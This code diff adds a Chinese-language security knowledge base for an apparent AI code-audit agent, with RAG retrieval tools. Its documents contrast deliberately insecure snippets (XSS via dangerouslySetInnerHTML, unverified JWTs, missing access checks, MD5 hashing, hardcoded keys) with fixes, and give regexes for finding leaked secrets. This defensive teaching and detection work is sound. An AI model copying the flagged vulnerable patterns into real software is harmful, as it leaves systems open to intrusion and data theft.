};
}
// 页面中
function Page({ search }) {
return <script dangerouslySetInnerHTML={{
__html: `window.search = "${search}"` // XSS!
}} />;
}
// 安全 - 使用JSON序列化
function Page({ search }) {
return <script dangerouslySetInnerHTML={{
__html: `window.search = ${JSON.stringify(search)}`
}} />;
}
```
### 敏感数据暴露
```jsx
// 危险 - 前端存储敏感数据
localStorage.setItem('token', apiToken);
localStorage.setItem('user', JSON.stringify(userData));
// 危险 - 在状态中存储敏感信息
const [creditCard, setCreditCard] = useState(cardNumber);
// 安全 - 使用HttpOnly Cookie存储token
// 敏感数据只在需要时从后端获取
```
### 依赖安全
```jsx
// 危险 - 使用有漏洞的包
import serialize from 'serialize-javascript';
// 某些版本有XSS漏洞
// 安全 - 定期审计
// npm audit
// yarn audit
```
### 环境变量泄露
```jsx
// 危险 - 暴露服务端密钥
// .env
REACT_APP_API_KEY=secret_key // 会被打包到前端
// 安全 - 敏感密钥只在服务端使用
// 前端只使用公开的配置
```
## 安全最佳实践
1. 避免使用dangerouslySetInnerHTML
2. 验证所有URL协议
3. 不要在前端存储敏感数据
4. 使用Content Security Policy
5. 定期更新依赖
6. 使用TypeScript增强类型安全
""",
)

View File

@ -0,0 +1,148 @@
"""
Supabase 安全知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
SUPABASE_SECURITY = KnowledgeDocument(
id="framework_supabase",
title="Supabase Security",
category=KnowledgeCategory.FRAMEWORK,
tags=["supabase", "postgresql", "rls", "auth", "baas"],
content="""
Supabase 是一个开源的Firebase替代品安全性主要依赖于Row Level Security (RLS)
## 核心安全机制
1. Row Level Security (RLS)
2. JWT认证
3. PostgreSQL权限系统
## 常见漏洞模式
### RLS未启用
```sql
-- 危险 - 表没有启用RLS
CREATE TABLE posts (
id SERIAL PRIMARY KEY,
user_id UUID,
content TEXT
);
-- 任何人都可以访问所有数据
-- 安全 - 启用RLS
ALTER TABLE posts ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Users can only see their own posts"
ON posts FOR SELECT
USING (auth.uid() = user_id);
```
### RLS策略不完整
```sql
-- 危险 - 只有SELECT策略
CREATE POLICY "select_policy" ON posts FOR SELECT
USING (auth.uid() = user_id);
-- INSERT/UPDATE/DELETE没有策略可能被绕过
-- 安全 - 完整的CRUD策略
CREATE POLICY "insert_policy" ON posts FOR INSERT
WITH CHECK (auth.uid() = user_id);
CREATE POLICY "update_policy" ON posts FOR UPDATE
USING (auth.uid() = user_id);
CREATE POLICY "delete_policy" ON posts FOR DELETE
USING (auth.uid() = user_id);
```
### 服务端密钥泄露
```javascript
// 危险 - 在前端使用service_role密钥
const supabase = createClient(url, 'service_role_key');
// service_role绕过RLS
// 安全 - 前端只使用anon key
const supabase = createClient(url, 'anon_key');
```
### 不安全的函数
```sql
-- 危险 - SECURITY DEFINER函数
CREATE FUNCTION get_all_users()
RETURNS SETOF users
LANGUAGE sql
SECURITY DEFINER -- 以函数所有者权限执行
AS $$
SELECT * FROM users;
$$;
-- 安全 - 使用SECURITY INVOKER或添加检查
CREATE FUNCTION get_user_data(target_user_id UUID)
RETURNS SETOF users
LANGUAGE sql
SECURITY INVOKER
AS $$
SELECT * FROM users WHERE id = target_user_id;
$$;
```
### 存储桶权限
```sql
-- 危险 - 公开存储桶
INSERT INTO storage.buckets (id, name, public)
VALUES ('uploads', 'uploads', true);
-- 任何人都可以访问所有文件
-- 安全 - 私有存储桶 + RLS
INSERT INTO storage.buckets (id, name, public)
VALUES ('uploads', 'uploads', false);
CREATE POLICY "Users can access own files"
ON storage.objects FOR SELECT
USING (auth.uid()::text = (storage.foldername(name))[1]);
```
### JWT验证绕过
```javascript
// 危险 - 不验证JWT
const { data } = await supabase
.from('posts')
.select('*')
.eq('user_id', userIdFromRequest); // 用户可以伪造
// 安全 - 使用auth.uid()
// RLS策略中使用auth.uid()自动从JWT获取用户ID
```
### Edge Functions安全
```typescript
// 危险 - 不验证请求来源
Deno.serve(async (req) => {
const { userId } = await req.json();
// 直接使用用户提供的userId
});
// 安全 - 从JWT获取用户
import { createClient } from '@supabase/supabase-js';
Deno.serve(async (req) => {
const authHeader = req.headers.get('Authorization');
const supabase = createClient(url, anonKey, {
global: { headers: { Authorization: authHeader } }
});
const { data: { user } } = await supabase.auth.getUser();
// 使用验证过的user.id
});
```
## 安全检查清单
1. 所有表都启用了RLS
2. 每个表都有完整的CRUD策略
3. 前端只使用anon key
4. service_role key只在服务端使用
5. 存储桶有适当的访问策略
6. 函数使用SECURITY INVOKER
7. Edge Functions验证JWT
""",
)

View File

@ -0,0 +1,207 @@
"""
知识加载器 - 基于RAG的知识模块加载
将安全知识集成到Agent的系统提示词中
"""
import logging
from typing import List, Dict, Any, Optional
from .base import KnowledgeCategory
logger = logging.getLogger(__name__)
class KnowledgeLoader:
"""
知识加载器
负责将RAG检索的知识集成到Agent系统提示词中
"""
def __init__(self, rag=None):
# 延迟导入避免循环依赖
if rag is None:
from .rag_knowledge import security_knowledge_rag
rag = security_knowledge_rag
self._rag = rag
async def load_module(self, module_name: str) -> str:
"""
加载单个知识模块
Args:
module_name: 模块名称如sql_injection, xss等
Returns:
模块内容
"""
knowledge = await self._rag.get_vulnerability_knowledge(module_name)
if knowledge:
return knowledge.get("content", "")
return ""
async def load_modules(self, module_names: List[str]) -> Dict[str, str]:
"""
批量加载知识模块
Args:
module_names: 模块名称列表
Returns:
模块名称到内容的映射
"""
result = {}
for name in module_names:
content = await self.load_module(name)
if content:
result[name] = content
return result
async def search_knowledge(
self,
query: str,
top_k: int = 3,
) -> List[Dict[str, Any]]:
"""
搜索相关知识
Args:
query: 搜索查询
top_k: 返回数量
Returns:
相关知识列表
"""
return await self._rag.search(query, top_k=top_k)
def build_system_prompt_with_modules(
self,
base_prompt: str,
module_names: List[str],
) -> str:
"""
构建包含知识模块的系统提示词同步版本使用内置知识
Args:
base_prompt: 基础系统提示词
module_names: 要加载的模块名称列表
Returns:
增强后的系统提示词
"""
if not module_names:
return base_prompt
# 使用内置知识(同步)
knowledge_sections = []
for name in module_names:
knowledge = self._get_builtin_knowledge(name)
if knowledge:
knowledge_sections.append(f"### {knowledge['title']}\n{knowledge['content']}")
if not knowledge_sections:
return base_prompt
knowledge_text = "\n\n".join(knowledge_sections)
return f"""{base_prompt}
---
## 专业安全知识参考
以下是与当前任务相关的安全知识请在分析时参考
{knowledge_text}
---
"""
def _get_builtin_knowledge(self, module_name: str) -> Optional[Dict[str, Any]]:
"""获取内置知识(同步)"""
module_name_normalized = module_name.lower().replace("-", "_").replace(" ", "_")
for doc in self._rag._builtin_knowledge:
if doc.id == f"vuln_{module_name_normalized}" or doc.id == module_name_normalized:
return doc.to_dict()
# 模糊匹配
for doc in self._rag._builtin_knowledge:
if module_name_normalized in doc.id or any(
module_name_normalized in tag for tag in doc.tags
):
return doc.to_dict()
return None
def get_available_modules(self) -> List[str]:
"""获取所有可用的知识模块"""
return self._rag.get_all_vulnerability_types()
def get_all_module_names(self) -> List[str]:
"""获取所有模块名称(包括漏洞和框架)"""
vuln_types = self._rag.get_all_vulnerability_types()
frameworks = self._rag.get_all_frameworks()
return vuln_types + frameworks
def validate_modules(self, module_names: List[str]) -> Dict[str, List[str]]:
"""
验证知识模块是否存在
Args:
module_names: 要验证的模块名称列表
Returns:
{"valid": [...], "invalid": [...]}
"""
all_modules = self.get_all_module_names()
all_modules_normalized = {m.lower().replace("-", "_") for m in all_modules}
# 添加常见别名
aliases = {
"sql": "sql_injection",
"sqli": "sql_injection",
"xss": "xss_reflected",
"auth": "auth_bypass",
"idor": "idor",
"ssrf": "ssrf",
"rce": "command_injection",
"lfi": "path_traversal",
"xxe": "xxe",
}
valid = []
invalid = []
for name in module_names:
name_normalized = name.lower().replace("-", "_").replace(" ", "_")
# 检查直接匹配
if name_normalized in all_modules_normalized:
valid.append(name)
# 检查别名
elif name_normalized in aliases:
valid.append(aliases[name_normalized])
# 检查部分匹配
elif any(name_normalized in m for m in all_modules_normalized):
valid.append(name)
else:
invalid.append(name)
return {"valid": valid, "invalid": invalid}
# 全局实例
knowledge_loader = KnowledgeLoader()
# 便捷函数
def get_available_modules() -> List[str]:
"""获取所有可用的知识模块"""
return knowledge_loader.get_available_modules()
def get_module_content(module_name: str) -> Optional[str]:
"""获取模块内容(同步)"""
knowledge = knowledge_loader._get_builtin_knowledge(module_name)
return knowledge.get("content") if knowledge else None

View File

@ -0,0 +1,322 @@
"""
基于RAG的安全知识检索系统
利用现有的RAG模块实现安全知识的向量检索
"""
import logging
from typing import List, Dict, Any, Optional
from .base import KnowledgeDocument, KnowledgeCategory
logger = logging.getLogger(__name__)
class SecurityKnowledgeRAG:
"""
安全知识RAG检索系统
使用现有的RAG模块进行向量检索
"""
COLLECTION_NAME = "security_knowledge"
def __init__(
self,
persist_directory: Optional[str] = None,
):
self.persist_directory = persist_directory
self._indexer = None
self._retriever = None
self._initialized = False
# 内置知识库 - 从模块化文件加载
self._builtin_knowledge = self._load_builtin_knowledge()
async def initialize(self):
"""初始化RAG组件"""
if self._initialized:
return
try:
from ...rag import CodeIndexer, CodeRetriever, EmbeddingService
embedding_service = EmbeddingService()
self._indexer = CodeIndexer(
collection_name=self.COLLECTION_NAME,
embedding_service=embedding_service,
persist_directory=self.persist_directory,
)
self._retriever = CodeRetriever(
collection_name=self.COLLECTION_NAME,
embedding_service=embedding_service,
persist_directory=self.persist_directory,
)
await self._indexer.initialize()
await self._retriever.initialize()
# 检查是否需要索引内置知识
count = await self._indexer.get_chunk_count()
if count == 0:
await self._index_builtin_knowledge()
self._initialized = True
logger.info("SecurityKnowledgeRAG initialized")
except Exception as e:
logger.warning(f"Failed to initialize RAG: {e}, using fallback")
self._initialized = True # 标记为已初始化使用fallback
def _load_builtin_knowledge(self) -> List[KnowledgeDocument]:
"""从模块化文件加载内置安全知识"""
all_docs = []
# 加载漏洞知识
try:
from .vulnerabilities import ALL_VULNERABILITY_DOCS
all_docs.extend(ALL_VULNERABILITY_DOCS)
logger.debug(f"Loaded {len(ALL_VULNERABILITY_DOCS)} vulnerability docs")
except ImportError as e:
logger.warning(f"Failed to load vulnerability docs: {e}")
# 加载框架知识
try:
from .frameworks import ALL_FRAMEWORK_DOCS
all_docs.extend(ALL_FRAMEWORK_DOCS)
logger.debug(f"Loaded {len(ALL_FRAMEWORK_DOCS)} framework docs")
except ImportError as e:
logger.warning(f"Failed to load framework docs: {e}")
logger.info(f"Total knowledge documents loaded: {len(all_docs)}")
return all_docs
async def _index_builtin_knowledge(self):
"""索引内置知识到向量数据库"""
if not self._indexer:
return
logger.info("Indexing builtin security knowledge...")
# 转换为RAG可索引的格式
files = []
for doc in self._builtin_knowledge:
files.append({
"path": f"knowledge/{doc.category.value}/{doc.id}.md",
"content": doc.to_embedding_text(),
})
async for progress in self._indexer.index_files(files, base_path="knowledge"):
pass
logger.info(f"Indexed {len(files)} knowledge documents")
async def search(
self,
query: str,
category: Optional[KnowledgeCategory] = None,
top_k: int = 5,
) -> List[Dict[str, Any]]:
"""
搜索安全知识
Args:
query: 搜索查询
category: 知识类别过滤
top_k: 返回数量
Returns:
匹配的知识文档列表
"""
await self.initialize()
# 如果RAG可用使用向量检索
if self._retriever:
try:
results = await self._retriever.retrieve(
query=query,
top_k=top_k,
)
return [
{
"id": r.chunk_id,
"content": r.content,
"score": r.score,
"file_path": r.file_path,
}
for r in results
]
except Exception as e:
logger.warning(f"RAG search failed: {e}, using fallback")
# Fallback: 简单关键词匹配
return self._fallback_search(query, category, top_k)
def _fallback_search(
self,
query: str,
category: Optional[KnowledgeCategory],
top_k: int,
) -> List[Dict[str, Any]]:
"""简单的关键词匹配搜索fallback"""
query_lower = query.lower()
query_terms = query_lower.split()
results = []
for doc in self._builtin_knowledge:
if category and doc.category != category:
continue
# 计算匹配分数
score = 0
content_lower = doc.content.lower()
title_lower = doc.title.lower()
# 标题匹配权重更高
for term in query_terms:
if term in title_lower:
score += 0.3
if term in content_lower:
score += 0.1
# 完整查询匹配
if query_lower in title_lower:
score += 0.5
if query_lower in content_lower:
score += 0.2
# 标签匹配
for tag in doc.tags:
if query_lower in tag.lower() or any(t in tag.lower() for t in query_terms):
score += 0.15
# CWE/OWASP匹配
for cwe in doc.cwe_ids:
if query_lower in cwe.lower():
score += 0.25
for owasp in doc.owasp_ids:
if query_lower in owasp.lower():
score += 0.25
if score > 0:
results.append({
"id": doc.id,
"title": doc.title,
"content": doc.content,
"category": doc.category.value,
"score": min(score, 1.0),
"tags": doc.tags,
"cwe_ids": doc.cwe_ids,
"severity": doc.severity,
})
# 按分数排序
results.sort(key=lambda x: x["score"], reverse=True)
return results[:top_k]
async def get_vulnerability_knowledge(
self,
vuln_type: str,
) -> Optional[Dict[str, Any]]:
"""
获取特定漏洞类型的知识
Args:
vuln_type: 漏洞类型如sql_injection, xss等
Returns:
漏洞知识文档
"""
# 标准化漏洞类型名称
vuln_type_normalized = vuln_type.lower().replace("-", "_").replace(" ", "_")
# 先尝试精确匹配
for doc in self._builtin_knowledge:
if doc.id == f"vuln_{vuln_type_normalized}" or doc.id == vuln_type_normalized:
return doc.to_dict()
# 尝试部分匹配
for doc in self._builtin_knowledge:
if vuln_type_normalized in doc.id:
return doc.to_dict()
# 使用搜索
results = await self.search(vuln_type, top_k=1)
return results[0] if results else None
async def get_framework_knowledge(
self,
framework: str,
) -> Optional[Dict[str, Any]]:
"""
获取特定框架的安全知识
Args:
framework: 框架名称如fastapi, django等
Returns:
框架安全知识文档
"""
framework_normalized = framework.lower().replace("-", "_").replace(" ", "_")
for doc in self._builtin_knowledge:
if doc.category == KnowledgeCategory.FRAMEWORK:
if doc.id == f"framework_{framework_normalized}" or framework_normalized in doc.id:
return doc.to_dict()
# 使用搜索
results = await self.search(framework, category=KnowledgeCategory.FRAMEWORK, top_k=1)
return results[0] if results else None
def get_all_vulnerability_types(self) -> List[str]:
"""获取所有支持的漏洞类型"""
return [
doc.id.replace("vuln_", "")
for doc in self._builtin_knowledge
if doc.category == KnowledgeCategory.VULNERABILITY
]
def get_all_frameworks(self) -> List[str]:
"""获取所有支持的框架"""
return [
doc.id.replace("framework_", "")
for doc in self._builtin_knowledge
if doc.category == KnowledgeCategory.FRAMEWORK
]
def get_knowledge_by_tags(self, tags: List[str]) -> List[Dict[str, Any]]:
"""根据标签获取知识"""
results = []
tags_lower = [t.lower() for t in tags]
for doc in self._builtin_knowledge:
doc_tags_lower = [t.lower() for t in doc.tags]
if any(tag in doc_tags_lower for tag in tags_lower):
results.append(doc.to_dict())
return results
def get_knowledge_stats(self) -> Dict[str, Any]:
"""获取知识库统计信息"""
stats = {
"total": len(self._builtin_knowledge),
"by_category": {},
"by_severity": {},
}
for doc in self._builtin_knowledge:
cat = doc.category.value
stats["by_category"][cat] = stats["by_category"].get(cat, 0) + 1
if doc.severity:
sev = doc.severity
stats["by_severity"][sev] = stats["by_severity"].get(sev, 0) + 1
return stats
# 全局实例
security_knowledge_rag = SecurityKnowledgeRAG()

View File

@ -0,0 +1,257 @@
"""
知识查询工具 - 让Agent可以在运行时查询安全知识
基于RAG的知识检索工具
"""
import logging
from typing import Dict, Any, Optional, List, Type
from pydantic import BaseModel, Field
from ..tools.base import AgentTool, ToolResult
from .rag_knowledge import security_knowledge_rag, KnowledgeCategory
logger = logging.getLogger(__name__)
class SecurityKnowledgeQueryInput(BaseModel):
"""安全知识查询输入"""
query: str = Field(..., description="搜索查询,如漏洞类型、技术名称、安全概念等")
category: Optional[str] = Field(
None,
description="知识类别过滤: vulnerability, best_practice, remediation, code_pattern, compliance"
)
top_k: int = Field(3, description="返回结果数量", ge=1, le=10)
class SecurityKnowledgeQueryTool(AgentTool):
"""
安全知识查询工具
用于查询安全漏洞知识最佳实践修复建议等
"""
@property
def name(self) -> str:
return "query_security_knowledge"
@property
def description(self) -> str:
return """查询安全知识库,获取漏洞类型、检测方法、修复建议等专业知识。
使用场景
- 需要了解某种漏洞类型的详细信息
- 查找安全最佳实践
- 获取修复建议
- 了解特定技术的安全考量
示例查询
- "SQL injection detection methods"
- "XSS prevention best practices"
- "SSRF vulnerability patterns"
- "hardcoded credentials"
"""
@property
def args_schema(self) -> Type[BaseModel]:
return SecurityKnowledgeQueryInput
async def _execute(
self,
query: str,
category: Optional[str] = None,
top_k: int = 3,
) -> ToolResult:
"""执行知识查询"""
try:
# 转换类别
knowledge_category = None
if category:
try:
knowledge_category = KnowledgeCategory(category.lower())
except ValueError:
pass
# 执行搜索
results = await security_knowledge_rag.search(
query=query,
category=knowledge_category,
top_k=top_k,
)
if not results:
return ToolResult(
success=True,
data="未找到相关的安全知识。请尝试使用不同的关键词。",
metadata={"query": query, "results_count": 0},
)
# 格式化结果
formatted_results = []
for i, result in enumerate(results, 1):
formatted = f"### 结果 {i}"
if result.get("title"):
formatted += f": {result['title']}"
formatted += f"\n相关度: {result.get('score', 0):.2f}\n"
if result.get("tags"):
formatted += f"标签: {', '.join(result['tags'])}\n"
if result.get("cwe_ids"):
formatted += f"CWE: {', '.join(result['cwe_ids'])}\n"
formatted += f"\n{result.get('content', '')}"
formatted_results.append(formatted)
output = f"找到 {len(results)} 条相关知识:\n\n" + "\n\n---\n\n".join(formatted_results)
return ToolResult(
success=True,
data=output,
metadata={
"query": query,
"results_count": len(results),
"results": results,
},
)
except Exception as e:
logger.error(f"Knowledge query failed: {e}")
return ToolResult(
success=False,
error=f"知识查询失败: {str(e)}",
)
class VulnerabilityKnowledgeInput(BaseModel):
"""漏洞知识查询输入"""
vulnerability_type: str = Field(
...,
description="漏洞类型,如: sql_injection, xss, command_injection, path_traversal, ssrf, deserialization, hardcoded_secrets, auth_bypass"
)
class GetVulnerabilityKnowledgeTool(AgentTool):
"""
获取特定漏洞类型的完整知识
返回该漏洞类型的检测方法危险模式修复建议等完整信息
"""
@property
def name(self) -> str:
return "get_vulnerability_knowledge"
@property
def description(self) -> str:
return """获取特定漏洞类型的完整专业知识。
支持的漏洞类型
- sql_injection: SQL注入
- xss: 跨站脚本攻击
- command_injection: 命令注入
- path_traversal: 路径遍历
- ssrf: 服务端请求伪造
- deserialization: 不安全的反序列化
- hardcoded_secrets: 硬编码凭证
- auth_bypass: 认证绕过
返回内容包括
- 漏洞概述和危害
- 危险代码模式
- 检测方法
- 安全实践
- 修复示例
"""
@property
def args_schema(self) -> Type[BaseModel]:
return VulnerabilityKnowledgeInput
async def _execute(self, vulnerability_type: str) -> ToolResult:
"""获取漏洞知识"""
try:
knowledge = await security_knowledge_rag.get_vulnerability_knowledge(
vulnerability_type
)
if not knowledge:
available = security_knowledge_rag.get_all_vulnerability_types()
return ToolResult(
success=True,
data=f"未找到漏洞类型 '{vulnerability_type}' 的知识。\n\n可用的漏洞类型: {', '.join(available)}",
metadata={"available_types": available},
)
# 格式化输出
output_parts = [
f"# {knowledge.get('title', vulnerability_type)}",
f"严重程度: {knowledge.get('severity', 'N/A')}",
]
if knowledge.get("cwe_ids"):
output_parts.append(f"CWE: {', '.join(knowledge['cwe_ids'])}")
if knowledge.get("owasp_ids"):
output_parts.append(f"OWASP: {', '.join(knowledge['owasp_ids'])}")
output_parts.append("")
output_parts.append(knowledge.get("content", ""))
return ToolResult(
success=True,
data="\n".join(output_parts),
metadata=knowledge,
)
except Exception as e:
logger.error(f"Get vulnerability knowledge failed: {e}")
return ToolResult(
success=False,
error=f"获取漏洞知识失败: {str(e)}",
)
class ListKnowledgeModulesInput(BaseModel):
"""列出知识模块输入"""
category: Optional[str] = Field(
None,
description="按类别过滤: vulnerability, best_practice, remediation"
)
class ListKnowledgeModulesTool(AgentTool):
"""
列出所有可用的知识模块
"""
@property
def name(self) -> str:
return "list_knowledge_modules"
@property
def description(self) -> str:
return "列出所有可用的安全知识模块,包括漏洞类型、最佳实践等"
@property
def args_schema(self) -> Type[BaseModel]:
return ListKnowledgeModulesInput
async def _execute(self, category: Optional[str] = None) -> ToolResult:
"""列出知识模块"""
try:
modules = security_knowledge_rag.get_all_vulnerability_types()
output = "可用的安全知识模块:\n\n"
output += "## 漏洞类型\n"
for module in modules:
output += f"- {module}\n"
return ToolResult(
success=True,
data=output,
metadata={"modules": modules},
)
except Exception as e:
logger.error(f"List knowledge modules failed: {e}")
return ToolResult(
success=False,
error=f"列出知识模块失败: {str(e)}",
)

View File

@ -0,0 +1,62 @@
"""
漏洞类型知识模块
包含各种漏洞类型的专业知识
"""
from .injection import SQL_INJECTION, NOSQL_INJECTION, COMMAND_INJECTION, CODE_INJECTION
from .xss import XSS_REFLECTED, XSS_STORED, XSS_DOM
from .auth import AUTH_BYPASS, IDOR, BROKEN_ACCESS_CONTROL
from .crypto import WEAK_CRYPTO, HARDCODED_SECRETS
from .ssrf import SSRF
from .deserialization import INSECURE_DESERIALIZATION
from .path_traversal import PATH_TRAVERSAL
from .xxe import XXE
from .race_condition import RACE_CONDITION
# 所有漏洞知识文档
ALL_VULNERABILITY_DOCS = [
# 注入类
SQL_INJECTION,
NOSQL_INJECTION,
COMMAND_INJECTION,
CODE_INJECTION,
# XSS类
XSS_REFLECTED,
XSS_STORED,
XSS_DOM,
# 认证授权类
AUTH_BYPASS,
IDOR,
BROKEN_ACCESS_CONTROL,
# 加密类
WEAK_CRYPTO,
HARDCODED_SECRETS,
# 其他
SSRF,
INSECURE_DESERIALIZATION,
PATH_TRAVERSAL,
XXE,
RACE_CONDITION,
]
__all__ = [
"ALL_VULNERABILITY_DOCS",
"SQL_INJECTION",
"NOSQL_INJECTION",
"COMMAND_INJECTION",
"CODE_INJECTION",
"XSS_REFLECTED",
"XSS_STORED",
"XSS_DOM",
"AUTH_BYPASS",
"IDOR",
"BROKEN_ACCESS_CONTROL",
"WEAK_CRYPTO",
"HARDCODED_SECRETS",
"SSRF",
"INSECURE_DESERIALIZATION",
"PATH_TRAVERSAL",
"XXE",
"RACE_CONDITION",
]

View File

@ -0,0 +1,231 @@
"""
认证和授权漏洞知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
AUTH_BYPASS = KnowledgeDocument(
id="vuln_auth_bypass",
title="Authentication Bypass",
category=KnowledgeCategory.VULNERABILITY,
tags=["authentication", "bypass", "login", "session", "jwt"],
severity="critical",
cwe_ids=["CWE-287", "CWE-306"],
owasp_ids=["A07:2021"],
content="""
认证绕过允许攻击者在不提供有效凭证的情况下访问系统
## 危险模式
### JWT验证缺失
```python
# 危险 - 不验证签名
jwt.decode(token, options={"verify_signature": False})
# 危险 - 允许none算法
jwt.decode(token, algorithms=["HS256", "none"])
# 危险 - 弱密钥
jwt.encode(payload, "secret", algorithm="HS256")
```
### 会话管理问题
```python
# 危险 - 可预测的会话ID
session_id = str(user_id)
session_id = hashlib.md5(username.encode()).hexdigest()
# 危险 - 会话固定
session['user'] = user # 登录后未重新生成session
```
### 认证逻辑缺陷
```python
# 危险 - 逻辑绕过
if user.is_admin or request.args.get('admin') == 'true':
return admin_panel()
# 危险 - 默认凭证
if username == "admin" and password == "admin":
return login_success()
```
## 检测要点
1. JWT的算法和签名验证
2. 会话ID的随机性
3. 登录后是否重新生成会话
4. 认证逻辑的完整性
5. 默认/硬编码凭证
## 安全实践
1. 强制验证JWT签名
2. 使用强随机会话ID
3. 登录后重新生成会话
4. 多因素认证
5. 账户锁定机制
## 修复示例
```python
# 安全 - 正确验证JWT
jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
# 安全 - 登录后重新生成会话
session.regenerate()
session['user_id'] = user.id
```
""",
)
IDOR = KnowledgeDocument(
id="vuln_idor",
title="Insecure Direct Object Reference (IDOR)",
category=KnowledgeCategory.VULNERABILITY,
tags=["idor", "authorization", "access-control", "bola"],
severity="high",
cwe_ids=["CWE-639"],
owasp_ids=["A01:2021"],
content="""
IDOR不安全的直接对象引用允许攻击者通过修改参数访问其他用户的数据
## 危险模式
### 直接使用用户输入的ID
```python
# 危险 - 无权限检查
@app.route('/api/user/<user_id>')
def get_user(user_id):
return User.query.get(user_id).to_dict()
# 危险 - 文件访问
@app.route('/download/<file_id>')
def download(file_id):
return send_file(f"/uploads/{file_id}")
```
### API端点
```python
# 危险
GET /api/orders/12345 # 可以改成其他订单ID
GET /api/users/100/profile
DELETE /api/documents/999
```
## 攻击方式
1. 递增/递减ID值
2. 使用其他用户的ID
3. 批量枚举
4. 参数污染
## 检测要点
1. 检查所有使用ID参数的端点
2. 验证是否有权限检查
3. 检查是否验证资源所有权
4. 关注批量操作接口
## 安全实践
1. 始终验证资源所有权
2. 使用UUID代替自增ID
3. 实现基于角色的访问控制
4. 记录访问日志
## 修复示例
```python
# 安全 - 验证所有权
@app.route('/api/user/<user_id>')
@login_required
def get_user(user_id):
user = User.query.get(user_id)
if user.id != current_user.id and not current_user.is_admin:
abort(403)
return user.to_dict()
# 安全 - 使用当前用户上下文
@app.route('/api/profile')
@login_required
def get_profile():
return current_user.to_dict()
```
""",
)
BROKEN_ACCESS_CONTROL = KnowledgeDocument(
id="vuln_broken_access_control",
title="Broken Access Control",
category=KnowledgeCategory.VULNERABILITY,
tags=["access-control", "authorization", "privilege", "rbac"],
severity="critical",
cwe_ids=["CWE-284", "CWE-285"],
owasp_ids=["A01:2021"],
content="""
访问控制失效允许用户执行超出其权限的操作
## 危险模式
### 缺少权限检查
```python
# 危险 - 管理功能无权限验证
@app.route('/admin/delete_user/<user_id>')
def delete_user(user_id):
User.query.get(user_id).delete()
return "Deleted"
# 危险 - 仅前端隐藏
# 前端隐藏了按钮但API无保护
```
### 权限提升
```python
# 危险 - 可修改角色
@app.route('/api/user/update', methods=['POST'])
def update_user():
user = current_user
user.role = request.json.get('role') # 用户可自己提升权限
db.commit()
```
### 水平越权
```python
# 危险 - 可访问其他用户数据
@app.route('/api/orders')
def get_orders():
user_id = request.args.get('user_id') # 可指定任意用户
return Order.query.filter_by(user_id=user_id).all()
```
## 检测要点
1. 所有敏感操作是否有权限检查
2. 权限检查是否在服务端
3. 是否可以修改自己的权限
4. 是否可以访问其他用户的资源
## 安全实践
1. 默认拒绝所有访问
2. 服务端强制权限检查
3. 使用RBAC/ABAC
4. 记录所有访问尝试
5. 定期审计权限配置
## 修复示例
```python
# 安全 - 装饰器检查权限
@app.route('/admin/delete_user/<user_id>')
@login_required
@admin_required
def delete_user(user_id):
User.query.get(user_id).delete()
return "Deleted"
# 安全 - 白名单可修改字段
ALLOWED_FIELDS = ['name', 'email', 'avatar']
@app.route('/api/user/update', methods=['POST'])
@login_required
def update_user():
for field in request.json:
if field in ALLOWED_FIELDS:
setattr(current_user, field, request.json[field])
```
""",
)

View File

@ -0,0 +1,163 @@
"""
加密相关漏洞知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
WEAK_CRYPTO = KnowledgeDocument(
id="vuln_weak_crypto",
title="Weak Cryptography",
category=KnowledgeCategory.VULNERABILITY,
tags=["crypto", "encryption", "hash", "md5", "sha1"],
severity="medium",
cwe_ids=["CWE-327", "CWE-328"],
owasp_ids=["A02:2021"],
content="""
使用弱加密算法或不当的加密实现可能导致数据泄露
## 危险模式
### 弱哈希算法
```python
# 危险 - MD5/SHA1用于密码
password_hash = hashlib.md5(password.encode()).hexdigest()
password_hash = hashlib.sha1(password.encode()).hexdigest()
# 危险 - 无盐哈希
hash = hashlib.sha256(password.encode()).hexdigest()
```
### 弱加密算法
```python
# 危险 - DES/3DES
from Crypto.Cipher import DES
cipher = DES.new(key, DES.MODE_ECB)
# 危险 - ECB模式
cipher = AES.new(key, AES.MODE_ECB)
# 危险 - 弱密钥
key = "12345678" # 短密钥
key = password.encode()[:16] # 从密码派生
```
### 不安全的随机数
```python
# 危险 - 使用random模块
import random
token = ''.join(random.choices(string.ascii_letters, k=32))
session_id = random.randint(0, 999999)
```
## 检测关键词
- md5, sha1, des, 3des, rc4
- MODE_ECB
- random.random, random.randint
- 硬编码的密钥/IV
## 安全实践
1. 密码使用bcrypt/argon2/scrypt
2. 加密使用AES-256-GCM
3. 使用secrets模块生成随机数
4. 使用KDF派生密钥
## 修复示例
```python
# 安全 - 密码哈希
import bcrypt
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
# 安全 - 加密
from cryptography.fernet import Fernet
key = Fernet.generate_key()
cipher = Fernet(key)
# 安全 - 随机数
import secrets
token = secrets.token_urlsafe(32)
```
""",
)
HARDCODED_SECRETS = KnowledgeDocument(
id="vuln_hardcoded_secrets",
title="Hardcoded Secrets",
category=KnowledgeCategory.VULNERABILITY,
tags=["secrets", "password", "credentials", "api-key", "token", "leak"],
severity="high",
cwe_ids=["CWE-798", "CWE-259"],
owasp_ids=["A07:2021"],
content="""
硬编码的凭证可能被攻击者从源代码日志或配置文件中提取
## 危险模式
### 硬编码密码
```python
# 危险
password = "admin123"
db_password = "P@ssw0rd!"
root_password = "toor"
```
### 硬编码API密钥
```python
# 危险
api_key = "sk-1234567890abcdef"
aws_access_key = "AKIAIOSFODNN7EXAMPLE"
stripe_key = "sk_live_xxxxx"
github_token = "ghp_xxxxxxxxxxxx"
```
### 硬编码连接字符串
```python
# 危险
connection_string = "mysql://root:password@localhost/db"
redis_url = "redis://:password@localhost:6379"
mongodb_uri = "mongodb://admin:pass@localhost:27017"
```
### 配置文件中的密钥
```yaml
# 危险 - config.yaml
database:
password: "secret123"
jwt:
secret: "my-jwt-secret"
```
## 检测正则
```regex
# API Keys
(api[_-]?key|apikey)['\"]?\\s*[:=]\\s*['\"][a-zA-Z0-9]{16,}['\"]
# AWS Keys
AKIA[0-9A-Z]{16}
# Private Keys
-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----
# JWT Secrets
(jwt[_-]?secret|secret[_-]?key)['\"]?\\s*[:=]\\s*['\"][^'\"]+['\"]
```
## 安全实践
1. 使用环境变量
2. 使用密钥管理服务(AWS Secrets Manager, HashiCorp Vault)
